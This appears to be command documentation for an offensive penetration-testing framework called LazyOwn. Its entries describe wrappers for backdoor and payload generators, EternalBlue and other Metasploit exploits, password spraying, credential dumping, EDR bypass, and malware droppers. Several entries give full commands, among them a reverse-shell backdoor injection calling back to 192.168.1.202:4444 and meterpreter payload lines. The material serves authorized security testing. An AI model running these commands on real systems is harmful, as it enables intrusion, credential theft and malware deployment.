This function performs the following steps: 1. Constructs a URL to query the MalwareBazaar API with the provided tag. 2. Uses curl to send a POST request to the API and saves the response in a JSON file. 3. Checks if the file was successfully created and exists. 4. Loads the JSON data from the file. 5. Checks the query_status field to determine if there are results. - If no_results, prints a warning message and exits the function. 6. Iterates through the list of file information provided in the response. - Prints detailed information about each file, including: - File name - File type - File size - Hashes (SHA-256, SHA-1, MD5) - First seen date - Signature - Tags - ClamAV results (if any) - Downloads and uploads count 7. Deletes the temporary file used to store the API response.

Returns: None

download_malwarebazar

Download a malware sample from MalwareBazaar using its SHA256 hash.

This function allows the user to download a malware sample from MalwareBazaar by providing the SHA256 hash of the desired file. If the hash is not provided as an argument, the function will prompt an error message indicating the correct usage. The downloaded malware sample will be saved as a zipped file (malware.zip) and will be password protected.

Arguments: line (str): The SHA256 hash of the malware sample to be downloaded.

Returns: None

Example: >>> download_malwarebazar 094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d

Notes: - Ensure that the SHA256 hash provided is correct and that it corresponds to a file available on MalwareBazaar. - The downloaded file will be password protected using the password “infected”. - To obtain the SHA256 hash of malware samples, refer to the help malwarebazar command.

See Also: - run(command): Utility function used to execute the command for downloading the malware.

sslscan

Run an SSL scan on the specified remote host.

This function initiates an SSL scan on a specified remote host (rhost) using the sslscan-singleip.sh script. If a specific port is provided in the line argument, the scan will target that port; otherwise, it will scan all available ports.

Parameters: line (str): The port number to scan (optional). If omitted, the scan will target all ports.

Internal Variables: rhost (str): The remote host IP address or hostname extracted from the params attribute.

Returns: None

Example Usage: - To scan all ports on the specified rhost: sslscan - To scan a specific port (e.g., port 443) on rhost: sslscan 443

Note: - The check_rhost() function is used to validate the rhost before running the scan. - The sslscan-singleip.sh script must be present in the sessions directory.

cewl

This function constructs and executes a command for the ‘cewl’ tool. It first checks if the ‘url’ parameter is set. If not, it prints an error message. If the ‘url’ is set, it extracts the domain from the URL using the get_domain function. Then, it constructs a ‘cewl’ command with the specified parameters and prepares it for execution.

Scan to a depth of 2 (-d 2) and use a minimum word length of 5 (-m 5), save the words to a file (-w docswords.txt), targeting the given URL (https://example.com):

Parameters: line (str): The command line input for this function.

Expected self.params keys: - url (str): The URL to be used for the ‘cewl’ command.

Example usage: - assign url http://example.com - do_cewl

dmitry

This function constructs and executes a command for the ‘dmitry’ tool. It first checks if the ‘url’ parameter is set. If not, it prints an error message. If the ‘url’ is set, it extracts the domain from the URL using the get_domain function. Then, it constructs a ‘dmitry’ command with the specified parameters and prepares it for execution.

Run a domain whois lookup (w), an IP whois lookup (i), retrieve Netcraft info (n), search for subdomains (s), search for email addresses (e), do a TCP port scan (p), and save the output to example.txt (o) for the domain example.com:

Parameters: line (str): The command line input for this function.

Expected self.params keys: - url (str): The URL to be used for the ‘dmitry’ command.

Example usage: - assign url http://example.com - do_dmitry

graudit

Executes the graudit command to perform a static code analysis with the specified options.

This function runs the ‘graudit’ tool with the ‘-A’ option for an advanced scan and the ‘-i sessions’ option to include session files. The results will be displayed directly in the terminal.

Args: line (str): Input line from the command interface. This argument is currently not used within the function but is required for the command interface structure.

Example: To run this function from the command interface, simply type ‘graudit’ and press enter. The function will execute the ‘graudit -A -i sessions’ command.

Note: Ensure that ‘graudit’ is installed and properly configured in your system’s PATH for this function to work correctly.

msfrpc

Connects to the msfrpcd daemon and allows remote control of Metasploit.

Usage: msfrpc -a -p -U -P [-S]

This command will prompt the user for necessary information to connect to msfrpcd.

nuclei

Executes a Nuclei scan on a specified target URL or host.

Usage: nuclei -u [-o ] [other options]

If a URL is provided as an argument, it will be used as the target for the scan. Otherwise, it will use the target specified in self.params[“rhost”].

parsero

Executes a parsero scan on a specified target URL or host.

Usage: parsero -u [-o ] [other options]

If a URL is provided as an argument, it will be used as the target for the scan. Otherwise, it will use the target specified in self.params[“rhost”].

sherlock

Executes the Sherlock tool to find usernames across social networks.

This function takes a username as an argument and runs the Sherlock tool to check for the username’s presence on various social networks. The results are saved in CSV format in the sessions directory.

Parameters: line (str): The username to be checked by Sherlock. If not provided, an error message is printed and the function returns.

Returns: None

Raises: None

Example: >>> do_sherlock(“example_user”) Running command: sherlock example_user –local -v –csv –print-found

Additional Notes: - The Sherlock tool must be installed and available in the system path. - The results are saved in the sessions directory as a CSV file. - The --local flag forces the use of a local data.json file, which should be present in the appropriate directory.

trufflehog

Executes trufflehog to search for secrets in a given Git repository URL. If trufflehog is not installed, it installs the tool automatically. This function navigates to the ‘sessions’ directory and runs trufflehog with the provided Git URL, outputting the results in JSON format.

Args: line (str): The Git repository URL to scan for secrets.

Returns: None

Raises: None

Example: trufflehog https://github.com/user/repo.git

Notes: - Ensure that trufflehog is installed or it will be installed automatically. - The output of the trufflehog scan is printed and executed in the ‘sessions’ directory.

weevelygen

Generate a PHP backdoor using Weevely, protected with the given password.

This function generates a PHP backdoor file using the specified password. It ensures that Weevely is installed on the system before attempting to generate the backdoor. If Weevely is not present, it will be installed automatically.

Usage: ┌─[LazyOwn👽127.0.0.1 ~/LazyOwn][10.10.10.10][http://victim.local/] └╼ $ weevelygen s3cr3t

Parameters: line (str): The password to protect the generated PHP backdoor.

Returns: None

Raises: print_error: If the password argument is not provided. print_warn: If Weevely is not installed and needs to be installed.

Example: To generate a PHP backdoor protected with the password ‘s3cr3t’, use the following command: $ weevelygen s3cr3t

weevely

Connect to PHP backdoor using Weevely, protected with the given password.

This function Connect to PHP backdoor file using the specified password. It ensures that Weevely is installed on the system before attempting to generate the backdoor. If Weevely is not present, it will be installed automatically.

Usage: ┌─[LazyOwn👽127.0.0.1 ~/LazyOwn][10.10.10.10][http://victim.local/] └╼ $ weevely http://victim.local/weevely.php s3cr3t

Parameters: line (str): the url to Weevely shell and the password to protect the generated PHP backdoor.

Returns: None

Raises: print_error: If the password argument is not provided. print_warn: If Weevely is not installed and needs to be installed.

Example: To generate a PHP backdoor protected with the password ‘s3cr3t’, use the following command: $ weevelygen s3cr3t

changeme

Executes a changeme scan on a specified target URL or host.

Usage: changeme [-o ] –oa -t 20 rhost

If a URL is provided as an argument, it will be used as the target for the scan. Otherwise, it will use the target specified in self.params[“rhost”].

enum4linux_ng

Performs enumeration of information from a target system using enum4linux-ng.

  1. Executes the enum4linux-ng command with the -A option to gather extensive information from the specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution: To manually enumerate information from a system, use the following command: enum4linu-ng -A

Replace <target_host> with the IP address or hostname of the target system.

For example: enum4linux-ng -A 192.168.1.10

fuzz

Executes a web server fuzzing script with user-provided parameters.

This function prompts the user for the necessary parameters to run the fuzzing script, including the target IP, port, HTTP method, directory, file extension, and expected status codes.

Usage: fuzzing

Parameters: line (str): The command line input for the function (not used directly in the current implementation).

Returns: None

Example: To run the fuzzing script, enter the required parameters when prompted by the function.

sharpshooter

Executes a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS, and WSF.

Usage: sharpshooter [-o ] –oa -t 20 rhost

This function installs SharpShooter if it is not already installed, prompts the user for the payload type, and then runs SharpShooter to create a payload based on the specified type.

Parameters: line (str): The command line input for the function (not used directly in the current implementation).

Returns: None

Example: To create a payload using SharpShooter, ensure you have already generated shellcode using lazymsfvenom or venom, and then run this function to specify the payload type and generate the final payload file.

sliver_server

Starts the Sliver server and generates a client configuration file for connecting clients. Provides options to download the Sliver client for Windows, Linux, or macOS.

Usage: sliver-server [flags] sliver-client command

This function installs Sliver if it is not already installed, starts the Sliver server, generates the necessary certificates, and creates a client configuration file. It also provides options to download the client for different operating systems.

Parameters: line (str): The command line input for the function (not used directly in the current implementation).

Returns: None

Example: To start the Sliver server, generate the necessary certificates, and download the client, run this function. Choose the appropriate client download option based on the operating system.

gencert

Generates a certificate authority (CA), client certificate, and client key.

Returns: str: Paths to the generated CA certificate, client certificate, and client key.

kerbrute

Executes the Kerbrute tool to enumerate user accounts against a specified target domain controller.

This function performs the following actions: 1. Retrieves necessary parameters such as the target URL and remote host (rhost). 2. Determines the domain based on the provided URL. 3. Validates the remote host address. 4. Constructs and executes the Kerbrute command to enumerate user accounts, saving the results in the sessions/users.txt file.

Parameters: line (str): Specify ‘pass’ to use credentials from ‘credentials.txt’ for password spraying, ‘brute’ to brute force using ‘users.txt’ and the RockYou wordlist, or leave empty for default behavior.

Returns: None

Example: To enumerate user accounts using Kerbrute, ensure Kerbrute is in your path, then run this function to perform the enumeration.

Note: - The function assumes that the Kerbrute binary (kerbrute_linux_amd64) is present in the system’s PATH. - The file sessions/users.txt should exist and contain the list of usernames to enumerate.

dacledit

Execute the dacledit.py command for a specific user or all users listed in the users.txt file.

This function interacts with the DACL editor to modify access control lists in an Active Directory environment. It allows the user to select a specific user from the list or execute the command for all users. Install impacket suit to get this script in the examples Args: line (str): The organizational unit (OU) in the format ‘OU=EXAMPLE,DC=DOMAIN,DC=EXT’. If not provided, the user is prompted to enter it.

Returns: None

Workflow: 1. Extract parameters and assign up paths. 2. Check the reachability of the remote host. 3. Prompt the user for an OU if not provided. 4. Check if the users.txt file exists and read the list of users. 5. Display the list of users and prompt the user to select a specific user. 6. Execute the dacledit.py command for the selected user or all users.

Raises: FileNotFoundError: If the users.txt file does not exist.

Example: To execute the command for a specific user: >>> do_dacledit(“MARKETING DIGITAL”)

To execute the command for all users: >>> do_dacledit(““)

bloodyAD

Execute the bloodyAD.py command for a specific user or all users listed in the users.txt file.

This function interacts with BloodyAD to add users to a group in an Active Directory environment. It allows the user to select a specific user from the list or execute the command for all users. (use download_external option 48 to clone the repo) Args: line (str): The organizational unit (OU) in the format ‘CN=EXAMPLE,DC=DOMAIN,DC=EXT’. If not provided, the user is prompted to enter it.

Returns: None

Workflow: 1. Extract parameters and set up paths. 2. Check the reachability of the remote host. 3. Prompt the user for a CN if not provided. 4. Check if the users.txt file exists and read the list of users. 5. Display the list of users and prompt the user to select a specific user. 6. Execute the bloodyAD.py command for the selected user or all users.

Raises: FileNotFoundError: If the users.txt file does not exist.

Example: To execute the command for a specific user: >>> do_bloodyAD(““)

To execute the command for all users: >>> do_bloodyAD(““)

evilwinrm

Execute the Evil-WinRM tool for authentication attempts on a specified target using either password or hash.

This function provides the following functionality: 1. Validates the specified target host (rhost). 2. If line is “pass”, searches for credential files with the pattern credentials*.txt, prompts the user to optionally pass a PowerShell script, and iterates over the credentials to attempt authentication. 3. If line is “hash”, verifies the existence of a hash file, prompts for the username (default is Administrator), and attempts authentication using the specified hash. 4. If line is neither “pass” nor “hash”, displays a usage error.

Parameters: line (str): Command argument specifying the authentication method. - “pass”: Searches for credential files and authenticates using passwords. - “hash”: Authenticates using a hash file. If neither “pass” nor “hash” is provided, an error message with usage instructions is displayed.

Returns: None

getTGT

Requests a Ticket Granting Ticket (TGT) using the Impacket tool with provided credentials.

This function performs the following actions: 1. Checks if the provided target host (rhost) is valid. 2. Reads credentials from the credentials.txt file. 3. Uses each credential (username and password) to request a TGT with the Impacket tool. 4. Constructs and executes the Impacket command to obtain a TGT for each set of credentials.

Parameters: line (str): A command line argument, not used in this implementation.

Returns: None

apache_users

Performs enumeration of users from a target system using apache-users.

  1. Executes the apache-users command with the -h option to specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution: To manually enumerate information from a system, use the following command: apache-users -h -l -p -s 0 -e 403 -t 10

Replace <target_host> with the IP address or hostname of the target system.

For example: apache-users -h 192.168.1.202 -l /usr/share/wordlists/metasploit/unix_users.txt -p 80 -s 0 -e 403 -t 10

backdoor_factory

Creates a backdoored executable using backdoor-factory.

This function checks if backdoor-factory is installed, installs it if necessary, and then uses it to inject a reverse shell payload into a specified binary file. The binary is backdoored with a reverse shell payload that connects back to a specified host and port.

:param line: The absolute path to the file that will be backdoored. If not provided, the user is prompted to enter the path.

:returns: None

Manual execution: To manually create a backdoored executable, use the following command: backdoor-factory -f -H -P -s reverse_shell_tcp_inline -J -a -c -l 128 -o

Replace <file_path> with the path to the binary you want to backdoor, <lhost> with the IP address of the attacker’s machine, and <lport> with the port number to listen on. The <output_file> is the path where the backdoored binary will be saved.

For example: backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe

davtest

Tests WebDAV server configurations using davtest.

This function checks if davtest is installed and installs it if necessary. It then runs davtest to perform a WebDAV server test against a specified URL or the default URL configured in self.params.

:param line: The URL of the WebDAV server to test. If provided, it overrides the default URL. If not provided, the function uses the URL specified in self.params["rhost"].

:returns: None

Manual execution: To manually test a WebDAV server, use the following command: davtest –url

Replace <url> with the URL of the WebDAV server you want to test.

For example: davtest –url http://example.com/webdav

msfpc

Generates payloads using MSFvenom Payload Creator (MSFPC).

This function checks if msfpc is installed and installs it if necessary. It then runs msfpc with the specified parameters to create a payload for penetration testing.

:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution: To manually generate a payload using MSFPC, use the following command: msfpc

Replace the placeholders with the desired values. For example: msfpc windows 192.168.1.10 4444 reverse stageless tcp verbose

Example usage: msfpc windows 192.168.1.10 # Windows & manual IP. msfpc elf bind eth0 4444 # Linux, eth0’s IP & manual port. msfpc stageless cmd py https # Python, stageless command prompt. msfpc verbose loop eth1 # A payload for every type, using eth1’s IP. msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.

ivy

Generates payloads using Ivy with various options. Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.

This function checks if Ivy is installed and installs it if necessary. It then runs Ivy with the specified parameters to create various payloads.

:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution: To manually generate a payload using Ivy, use the following command: ./Ivy

Replace the placeholders with the desired values. For example: ./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js ./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:.exe -process32 C:.exe -O stageless.js

Example usage: ivy staged_inject -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js ivy stageless_local -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js ivy one_liner -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless

tord

Execute the tor.sh script with the specified port or default to port 80 if no port is provided.

This function constructs a command to run the tor.sh script with superuser privileges, it defaults to port 80. The command is then printed and executed.

Parameters: line (str): Defaults to “80”

Returns: None

Example: >>> do_tord(self, ““) sudo bash sessions/tor.sh

do_tord(self, ““) sudo bash sessions/tor.sh

Note: Ensure that the tor.sh script exists in the sessions directory and that you have the necessary permissions to execute scripts with sudo.

generatedic

Generates a wordlist based on a target name and a list of characters, with various combinations.

This function prompts the user for a target name and a wordlist name, then generates various combinations of the target name with a given list of characters. The combinations include single, double, triple, fourth, fifth, sixth, and intercalated character variations. The generated passwords are saved to the specified wordlist file.

:param line: Not used in this function.

:returns: None

Manual execution: To manually generate a wordlist, run the script and follow the prompts to enter the target name, wordlist name, and additional characters if desired.

For example: Enter target name(Ex. john) ::: john Enter wordlist name ::: my_wordlist.txt Char List ::: 1 2 3 4 5 6 7 8 9 0 ! @ # $ Do you want to add more characters in char List[y/n] ::: y Enter characters by commas(Ex. : ^,&,,) ::: ^,&,

trace

Traces the DNS information for a given domain using the FreeDNS service. (using freedns IP Not your IP)

This method performs a DNS trace lookup for the specified domain by sending an HTTP GET request to the FreeDNS service. If no domain is provided in the input parameter line, it defaults to using the URL specified in the instance’s parameters.

Parameters: line (str): The domain name to trace. If not provided, the method uses the domain extracted from self.params["url"].

Returns: None: This method executes a system command and does not return a value.

Example: >>> self.do_trace(“example.com”) Executes a DNS trace for “example.com”.

Notes: - Ensure that the self.params["url"] is set with a valid URL if no domain is provided. - The method uses os.system to execute the trace command, which may not be the most secure or efficient method for production code. Consider using a library like requests for HTTP operations if security and efficiency are concerns.

veil

Generates payloads using Veil-Evasion with various options. Veil-Evasion is a payload creation framework for generating payloads that evade antivirus detection. This function checks if Veil-Evasion is installed and installs it if necessary. It then runs Veil-Evasion with the specified parameters to create various payloads.

:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution: To manually generate a payload using Veil-Evasion, use the following command: ./Veil-Evasion.py -p

Replace the placeholders with the desired values. For example: ./Veil-Evasion.py -p python/meterpreter/rev_https LHOST=192.168.1.100 LPORT=443

Example usage: veil python_meterpreter_rev_https LHOST=192.168.1.100 LPORT=443 veil ruby_meterpreter_rev_tcp LHOST=192.168.1.100 LPORT=4444

empire

Generates payloads using PowerShell Empire with various options.

:param line: Not used in this implementation but reserved for future use.

:returns: None

evil_ssdp

Runs evil-ssdp with various options and user-selected templates.

:param line: Not used in this implementation but reserved for future use.

:returns: None

shellfire

Runs Shellfire with various options and allows generating payloads.

:param line: Not used in this implementation but reserved for future use.

:returns: None

graph

Generates a graph from JSON payload files containing URL, RHOST, and RPORT.

:param line: Not used in this implementation but reserved for future use.

:returns: None

netexec

Executes netexec with various options for network protocol operations.

This function handles the installation of netexec and allows the user to execute various network protocol operations with minimal input. It reads credentials from a specified file and constructs the necessary commands to interact with the target system.

:param line: Command line input from the user. This input is used to determine the protocol and action to be executed. :returns: None

The function performs the following steps: 1. Checks if netexec is installed. If not, it installs it. 2. Reads credentials from a file. 3. Constructs and executes the netexec command based on user input. 4. Enumerates available protocols and actions for each protocol, allowing the user to select them interactively. 5. Enumerates available options for each action, allowing the user to select them interactively.

Example usage:

do_netexec("smb target -u username -p password --shares")

This will execute the SMB protocol with the specified action and options.

If no specific command is provided, the function will prompt the user to select a protocol and action interactively.

scarecrow

Executes ScareCrow with various options for bypassing EDR solutions and executing shellcode. to create the shellcode.bin you need run venom or run lazymsfvenom, or run msfvenom yourself :D :param line: Not used directly but reserved for future use. :returns: None

createmail

Generate email permutations based on a full name and domain, then save them to a file.

This function prompts the user for a full name and domain, generates various email permutations based on that information, and saves the results in a text file located in the sessions directory.

Parameters: line (str): used as Fullname.

Internal Variables: full_name (str): The full name entered by the user, defaulting to ‘John Doe’. domain (str): The domain entered by the user, defaulting to ‘example.com’.

Returns: None

Example Usage: - To generate emails using default values: createmail - To specify a full name and domain: createmail

Note: - The generated emails will be stored in a file named emails_{full_name}_{domain}.txt within the sessions directory.

eyewitness

Executes EyeWitness to capture screenshots from a list of URLs. You need to provide a file containing URLs or a single URL to capture. :param line: Not used directly but reserved for future use. :returns: None

secretsdump

Run secretsdump.py with the provided domain, username, password, and IP address.

:param line: This parameter is not used in the function but can be reserved for future use.

:returns: None

Manual execution: To manually run secretsdump.py, use the following command:

secretsdump.py /:@

This function prompts the user for domain, username, password, and IP address.

getuserspns

Run GetUserSPNs.py with the provided domain, username, password, and IP address.

:param line: This parameter is not used in the function but can be reserved for future use.

:returns: None

Manual execution: To manually run GetUserSPNs.py, use the following command:

GetUserSPNs.py /: -dc-ip -request

This function prompts the user for domain, username, password, and IP address.

passwordspray

Perform password spraying using crackmapexec with the provided parameters.

:param line: This parameter is not used in the function but can be reserved for future use.

:returns: None

Manual execution: To manually run crackmapexec for password spraying, use the following command:

crackmapexec smb -u -p –continue-on-success

This function prompts the user for IP address, user file, and password.

vscan

Perform port scanning using vscan with the provided parameters.

:param line: This parameter is not used in the function but can be reserved for future use.

:returns: None

Manual execution: To manually run vscan for port scanning, use the following command:

./vscan -host -p

This function prompts the user for the target hosts and ports, and executes the vscan command accordingly.

shellshock

Attempt to exploit the Shellshock vulnerability (CVE-2014-6271, CVE-2014-7169).

This function generates HTTP requests with a crafted payload to detect if a target is vulnerable to Shellshock.

:param line: Input parameters for the function. :returns: None

generate_revshell

Generate a reverse shell in various programming languages.

This function prompts the user to choose a reverse shell type (Bash, Python, NetCat, PHP, Ruby, Perl, Telnet, NodeJS, Golang, PowerShell) and then asks for the necessary parameters (IP and port). Based on the user’s input, it generates the corresponding reverse shell command.

:param line: Not used in this implementation. :returns: None

alterx

Executes the ‘alterx’ command for subdomain enumeration on the provided domain. If ‘alterx’ is not installed, the function automatically downloads, installs, and configures it. The result of the subdomain enumeration is saved in a session-specific text file.

Steps performed by the function:

  1. Check if ‘alterx’ is installed:
  • Uses is_binary_present("alterx") to verify if the ‘alterx’ binary is available in the system.
  • If the binary is not found, the function prints a warning and proceeds to download and install ‘alterx’.
  1. Installation of ‘alterx’:
  • Executes a system command to create a directory named ‘alterx’ in the user’s home directory.
  • Downloads the ‘alterx’ version 0.0.4 (Linux 64-bit) from GitHub and extracts it into the ‘alterx’ directory.
  1. Add ‘alterx’ to system PATH:
  • Depending on the user’s shell (bash or zsh), it appends the ‘alterx’ directory to the system PATH by modifying the appropriate shell configuration file (~/.bashrc or ~/.zshrc). This ensures ‘alterx’ can be executed from any directory.
  1. Obtain the domain:
  • Retrieves the URL from the class parameter self.params["url"].
  • Extracts the domain from the URL using get_domain(url).
  • If no domain is provided as an argument in line, prompts the user to input a domain, defaulting to the previously extracted domain.
  1. Execute ‘alterx’ on the domain:
  • Executes the ‘alterx’ tool on the specified domain via a system command.
  • The subdomain enumeration results are saved to a file in the ‘sessions’ directory, with the filename subdomain_dic_<domain>.txt.

Parameters: - line (str): The domain on which to run ‘alterx’. If empty, the function prompts the user for input.

Returns: - None: The function performs its operations but does not return any value.

Dependencies: - The function relies on the external tool ‘alterx’ and assumes the presence of the is_binary_present() and get_domain() helper functions.

allin

Execute the AlliN.py tool with various scan modes and parameters.

This function prompts the user to choose a scan type (e.g., pscan, sfscan, bakscan), and then asks for the necessary parameters (host, ports, project name, etc.). Based on the user’s input, it generates the corresponding command and executes it.

:param line: Not used in this implementation. :returns: None

dr0p1t

Execute the Dr0p1t tool to create a stealthy malware dropper.

This function prompts the user to input the necessary parameters for generating a dropper, including the malware URL, persistence options, and additional configurations. Based on the user’s input, it constructs the command and executes it.

:param line: Not used in this implementation. :returns: None

gitdumper

Install and execute the git-dumper tool to download Git repository content.

This function checks if git-dumper is installed, and if not, installs it using pip. Then, it prompts the user to input the necessary parameters to run git-dumper, constructs the command, and executes it.

:param line: Not used in this implementation. :returns: None

powershell_cmd_stager

Generate and execute a PowerShell command stager to run a .ps1 script.

This function takes the name of a PowerShell script (.ps1), encodes its content in base64, and constructs a command to execute the script using PowerShell in a hidden and elevated manner. The function then prints the generated command.

:param line: The name of the PowerShell script file to encode and execute. :returns: None

Search the shell-storm API for shellcodes using the provided keywords.

This function sends a GET request to the shell-storm API with the specified keywords. It then prints the results.

:param line: A string containing the keywords to search for. :returns: None

ligolo

Automates the setup and execution of Ligolo server and client for tunneling and port forwarding.

:param line: The command line input containing the port number for Ligolo setup. :type line: str :returns: None

addusers

Opens or creates the users.txt file in the sessions directory for editing using nano.

:param line: Not used directly but reserved for future use.

:returns: None

windapsearch

Execute the windapsearch tool to perform Active Directory Domain enumeration through LDAP queries.

This function allows the user to specify various parameters for executing different LDAP query modules using windapsearch. It handles user input for domain, username, password, and other options, constructs the command, and executes it.

:param line: Not used in this implementation. :returns: None

passtightvnc

Decrypts TightVNC passwords using Metasploit.

This function demonstrates how TightVNC passwords can be decrypted using the known hardcoded DES key from the program and Metasploit’s Rex::Proto::RFB::Cipher.decrypt function.

Steps: - Receives the password in hexadecimal format from the command line input. - Creates a Metasploit resource script that includes commands to decrypt the TightVNC password. - Executes Metasploit with the created resource script and then deletes the temporary file. - Prints the decrypted password.

:param line: The TightVNC password in hexadecimal format. :type line: str :returns: None

Manual execution: To manually decrypt a TightVNC password, you would need to: - Use Metasploit’s Rex::Proto::RFB::Cipher.decrypt function with the hardcoded DES key and the hexadecimal password.

Example: passtightvnc D7A514D8C556AADE

shadowsocks

Execute the Shadowsocks tool to create a secure tunnel for network traffic.

This function allows the user to specify various parameters for configuring and running the Shadowsocks client or server. It handles user input for server address, port, password, encryption method, and other options, constructs the command, and executes it.

:param line: Not used in this implementation. :returns: None

kusa

Execute Kusanagi to generate payloads for command, code, or file injection.

This function allows the user to specify various parameters for configuring and running Kusanagi to generate payloads for reverse/bind shells or injected files/code. It handles user input for target addresses, ports, encoding, obfuscation, badchars, and other options, constructs the command, and executes it.

:param line: Not used in this implementation. :returns: None

windapsearchscrapeusers

Extracts usernames from a JSON output generated by go-windapsearch and appends them to the file sessions/users.txt.

The function loads the JSON file, parses the sAMAccountName attribute for each user, and appends the username to the sessions/users.txt file.

:param line: Path to the JSON file (e.g., ’sessions/_windap.json’). :returns: None

downloader

Generate a downloader command for files in the sessions directory.

This function lists all files in the ‘sessions’ directory recursively, excluding certain file extensions. The user can select a file, choose a download method, and the command is generated and copied to the clipboard.

:param line: Optional output filename for the downloader command. :returns: None

ldapsearch

Executes an LDAP search against a target remote host (rhost) and saves the results.

This function performs the following tasks: 1. Extracts the target remote host (rhost) from the class parameters. 2. Verifies if the rhost is valid using a custom check_rhost function. 3. Retrieves the domain information from the parameters. 4. Ensures that the ‘ldapsearch’ binary is available on the system. If it’s missing, the function attempts to install it using the system’s package manager (apt). 5. Constructs the LDAP search query based on the domain information, splitting the domain into components to form the correct base DN (Distinguished Name). 6. Runs the LDAP search with the following options: - -x: Simple authentication (anonymous bind). - -H: Specifies the LDAP server URL (using the rhost). - -b: Specifies the search base (constructed from the domain). - -s sub: Indicates the search scope, where ‘sub’ performs a subtree search. 7. Saves the result of the search to a log file under the ‘sessions’ directory, named based on the rhost. 8. Displays the log file content and checks for any ‘lock’ entries, which could indicate locked accounts or security incidents. 9. Extracts userPrincipalName attributes from the log, parses them, and appends the usernames (without domain) to a users.txt file for further analysis.

This function is useful in penetration testing engagements where LDAP enumeration is part of the reconnaissance phase. It automates LDAP queries and extracts useful user information, which could assist in credential harvesting, password spraying, or other user-based attacks.

eternal

Automates the EternalBlue (MS17-010) exploitation process using Metasploit.

This function performs the following tasks: 1. Selects the EternalBlue Metasploit module for Windows SMB exploitation. 2. Displays the current options for the module. 3. Sets the required payload options, such as LHOST and RHOST. 4. Executes the exploit and attempts to gain access to the target machine.

:param line: Command line input that provides the LHOST and RHOST. :type line: str :returns: None

cve

Search for a CVE using the CIRCL API.

This function sends a GET request to the CIRCL API to retrieve CVE details and prints relevant information to the screen.

:param line: A string containing the CVE ID (optional). :returns: None

evidence

Compresses the ‘sessions’ folder and encodes it into a video using the lazyown_infinitestorage.py script. If a filename is provided as an argument, it decodes the specified video instead.

This function operates in two modes depending on the input: 1. Encode Mode (default): - Compresses the contents of the ‘sessions’ directory into a ZIP file named ‘sessions.zip’. - Utilizes the lazyown_infinitestorage.py script to convert the ZIP file into a high-definition video file named ‘encoded_output.avi’ with a frame size of 1920x1080 and a frame rate of 25 FPS.

  1. Decode Mode:
  • When the ‘line’ parameter contains the string “decode”, it lists all available video files in the ‘sessions’ directory (files with .mp4, .mkv, or .avi extensions).
  • If there are no video files present, it prints an error message and exits.
  • Prompts the user to select a video by entering its corresponding number.
  • Constructs a command to decode the selected video file using the lazyown_infinitestorage.py script, outputting the decoded result to a specified directory.

:param line: An optional parameter that, when provided, indicates that the user wants to decode a video. If not provided, the function operates in encode mode. :type line: str :returns: None

Example usage: - To compress and encode: do_evidence() - To decode a video: do_evidence(‘decode’)

Notes: - The ‘sessions’ directory must exist and contain files for encoding. - The lazyown_infinitestorage.py script must be present in the specified directory. - Ensure that the output paths for both encoding and decoding do not conflict with existing files.

rejetto_hfs_exec

HttpFileServer version 2.3. Vulnerable using the module rejetto_hfs_exec of metasploit :param line: Command line input that provides the LHOST and RHOST. :type line: str :returns: None

ms08_067_netapi

SMB CVE-2008-4250. Vulnerable using the module ms08_067_netapi of metasploit :param line: Command line input that provides the LHOST and RHOST. :type line: str :returns: None

automsf

Try to check if Vulnerable using the module passed by argument of lazyown example automsf exploit/windows/iis/iis_webdav_upload_asp to use in metasploit :param line: Command line input that provides the LHOST and RHOST. :type line: str :returns: None

iis_webdav_upload_asp

(CVE-2017-7269). Vulnerable using the module iis_webdav_upload_asp of metasploit :param line: Command line input that provides the LHOST and RHOST. :type line: str :returns: None

nano

Opens or creates the file using line in the sessions directory for editing using nano.

:param line: name of the file to use in nano in session directory.

:returns: None

nc

Runs nc with the specified port for listening.

This function starts a nc listener on the specified local port. It can use a port defined in the lport parameter or a port provided as an argument.

Usage: nc

:param line: The port number to use for the nc listener. If not provided, it defaults to the lport parameter. :type line: str :returns: None

Manual execution: 1. Ensure that nc is installed and accessible from your command line. 2. The port number can either be provided as an argument or be set in the lport parameter of the function. 3. Run the function to start nc on the specified port.

If no port is provided as an argument, the function will use the port specified in the lport parameter. If a port is provided, it overrides the lport value.

After starting the listener, the function prints a message indicating that nc is running on the specified port and another message when the session is closed.

Dependencies: - nc: A tool used for creating reverse shells or bind shells.

rnc

Runs nc with rlwrap the specified port for listening.

This function starts a nc listener with rlwrap on the specified local port. It can use a port defined in the lport parameter or a port provided as an argument.

Usage: rnc

:param line: The port number to use for the nc listener. If not provided, it defaults to the lport parameter. :type line: str :returns: None

Manual execution: 1. Ensure that nc is installed and accessible from your command line. 2. The port number can either be provided as an argument or be set in the lport parameter of the function. 3. Run the function to start nc on the specified port.

If no port is provided as an argument, the function will use the port specified in the lport parameter. If a port is provided, it overrides the lport value.

After starting the listener, the function prints a message indicating that nc is running on the specified port and another message when the session is closed.

Dependencies: - nc: A tool used for creating reverse shells or bind shells.

createjsonmachine

Create a new JSON payload file based on the template provided in payload.json.

This function reads an existing JSON file named ‘payload.json’ and allows the user to update specific fields. The following fields can be modified:

  • ‘url’: The new URL to connect to, which can be entered manually or automatically generated based on the input parameter ‘line’.
  • ‘domain’: The new domain associated with the URL, similarly generated or entered.
